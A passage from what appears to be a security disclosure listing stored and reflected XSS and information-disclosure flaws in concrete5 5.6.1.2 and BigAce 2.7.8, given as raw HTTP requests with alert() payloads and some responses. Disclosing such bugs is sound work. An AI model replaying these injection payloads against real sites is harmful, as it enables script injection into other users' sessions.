            mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
        </div>
       

       
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314

akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---

18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971

input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


resp:


<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />                       
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
                       
                       
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

22. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID=60&blockTypesIncluded%5B1%5D=A
---< request >---

resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html


Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206


23. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html


Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24

24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization

26. xss
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---


28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952

input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---

29. information disclosure
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache

task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---


resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html


Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205


30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142

ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---

31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---


32. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87

SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---

33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210

miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---

Let me know if you have any questions.

Enjoy ;)

[EN] BigAce 2.7.8 Multiple bugs

Last week I saw that in latest version of BigAce CMS Yashar shahinzadeh found a vulnerability.

I decide to check it again, and I found few other things described below.

I. For normal registered ('anonymous') user:


1. Escaping from the source code via Host header:

---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---

Response:
 <link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaa
 aaaaa%3c%68%3 1%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text


II. For editor user logged-in:

1. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


5. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=

---< request >---

6. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


7. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

8. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

9. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

10. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---


11. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


12. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

14. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500

-----------------------------60191211818685
Content-Disposition: form-data; name="mode"

upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"

"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------60191211818685--
---< request >---


15. xss + information disclosure

---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode="%20body%20onload%3d"alert(4321)"%3e

---< request >---


Response:

<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
&nbsp;&nbsp;<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>.&nbsp;All rights reserved. <br />&copy; 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->


16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---


17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
